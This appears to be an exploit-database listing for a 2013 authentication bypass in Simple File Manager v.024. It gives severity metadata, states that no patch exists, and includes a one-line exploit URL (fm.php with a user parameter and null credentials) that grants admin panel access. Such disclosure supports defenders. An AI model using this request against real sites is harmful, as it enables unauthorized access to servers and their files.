header-logo
Suggest Exploit
vendor:
Simple File Manager
by:
Chako
9,3
CVSS
HIGH
Login Bypass
N/A
CWE
Product Name: Simple File Manager
Affected Version From: v.024
Affected Version To: v.024
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Simple File Manager v.024 Login Bypass Vulnerability

A vulnerability has been identified in Simple File Manager v.024, which could be exploited by attackers to bypass security restrictions into admin panel. An attacker can exploit this issue using a browser. The attacker can bypass the authentication process by setting the username and password parameters to a null value.

Mitigation:

N/A
Source

Exploit-DB raw data:

# Exploit Title: Simple File Manager v.024 Login Bypass Vulnerability
# Date Published: 2013/6/17
# Exploit Author: Chako
# Software Link: http://onedotoh.sourceforge.net/
# Version: v.024 (Doesn't work on v.025)


Description:
=====================
A vulnerability has been identified in Simple File Manager v.024, which could be exploited 
by attackers to bypass security restrictions into admin panel.


Exploit:
=====================
An attacker can exploit this issue using a browser.


http://www.target_example.com/fm.php?u=[UserName]